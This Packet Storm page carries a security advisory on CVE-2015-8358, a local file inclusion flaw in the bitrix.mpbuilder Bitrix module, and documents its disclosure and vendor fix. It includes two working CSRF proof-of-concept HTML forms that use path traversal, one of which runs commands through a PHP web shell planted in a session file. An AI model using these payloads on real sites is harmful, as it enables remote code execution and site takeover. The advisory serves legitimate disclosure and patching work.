exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

bitrix.mpbuilder Bitrix 1.0.10 Local File Inclusion

bitrix.mpbuilder Bitrix 1.0.10 Local File Inclusion
Posted Dec 11, 2015
Authored by High-Tech Bridge SA | Site htbridge.com

bitrix.mpbuilder Bitrix module version 1.0.10 suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
advisories | CVE-2015-8358
SHA-256 | d688c669bf51931323bfe010133ed5178c3bc69c4822fcbcef048fa6af5234b7

bitrix.mpbuilder Bitrix 1.0.10 Local File Inclusion

Change Mirror Download
Advisory ID: HTB23281
Product: bitrix.mpbuilder Bitrix module
Vendor: www.1c-bitrix.ru
Vulnerable Version(s): 1.0.10 and probably prior
Tested Version: 1.0.10
Advisory Publication: November 18, 2015 [without technical details]
Vendor Notification: November 18, 2015
Vendor Patch: November 25, 2015
Public Disclosure: December 9, 2015
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8358
Risk Level: Critical
CVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in bitrix.mpbuilder Bitrix module, which can be exploited to include and execute arbitrary PHP file on the target system with privileges of the web server. The attacker will be able to execute arbitrary system commands and gain complete control over the website.

Access to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector.

The vulnerability exists due to insufficient filtration of "work[]" HTTP POST parameter in "/bitrix/admin/bitrix.mpbuilder_step2.php" script before using it in the include() PHP function. A remote attacker can include and execute arbitrary local file on the target system.

A simple exploit below will include and execute "/tmp/file" file:

<form action="http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog" method="post" name="main">
<input type="hidden" name="save" value="1">
<input type="hidden" name="work[/../../../../../../../../../../../../../../../../../../tmp/file]" value="1">
<input value="submit" id="btn" type="submit" />
</form>


In a real-world scenario an attacker can use session files to execute arbitrary PHP code. For example, an attacker can change name in his profile to <? exec($_POST['cmd']); ?> and create a CSRF exploit that will pass arbitrary commands and execute them on the system. The PoC code below executes /bin/ls command using previously created session file with malicious "NAME" value:


<form action="http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog" method="post" name="main">
<input type="hidden" name="save" value="1">
<input type="hidden" name="work[/../../../../../../../../../../../../../../../../../../tmp/sess_[SESSION_ID]]" value="1">
<input type="hidden" name="cmd" value="ls">
<input value="submit" id="btn" type="submit" />
</form>



-----------------------------------------------------------------------------------------------

Solution:

Update to bitrix.mpbuilder module 1.0.12

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23281 - https://www.htbridge.com/advisory/HTB23281 - PHP File Inclusion in bitrix.mpbuilder Bitrix module
[2] bitrix.mpbuilder - https://marketplace.1c-bitrix.ru/solutions/bitrix.mpbuilder/ - Bitrix module for software developers.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close